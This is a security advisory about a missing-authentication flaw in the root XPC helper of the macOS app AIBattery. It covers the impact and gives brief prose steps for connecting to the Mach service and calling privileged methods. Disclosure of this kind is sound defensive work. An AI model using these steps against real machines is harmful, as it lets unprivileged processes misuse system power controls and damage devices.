whuan132 AIBattery Missing Authentication Vulnerability in XPC Service

A vulnerability exists in whuan132 AIBattery versions through 1.0.9, specifically within the com.collweb.AIBatteryHelper component. The issue arises in the AIBatteryHelper/XPC/BatteryXPCService.swift file, where a root-privileged XPC helper registers a public Mach service and accepts connections without proper authentication. This flaw allows any local, unprivileged process to invoke privileged methods related to power management and system control, bypassing macOS's security boundaries.

Impact

Exploitation of this vulnerability allows local, unprivileged processes to perform system-level power management tasks typically reserved for root. This includes forcing battery modes, disabling sleep, and manipulating charging states, which can lead to rapid battery depletion and potential damage. Such actions may disrupt normal system performance and cause overheating, further degrading the device's functionality.

Reproduction

To reproduce this vulnerability, create a client application that connects to the 'com.collweb.AIBatteryHelper' Mach service using an NSXPCConnection with privileged options. Once connected, the application can call exposed methods such as 'getVersion' to demonstrate successful exploitation. This process can be automated with a script that handles the connection and method invocation, simulating an unprivileged process exploiting the missing authentication.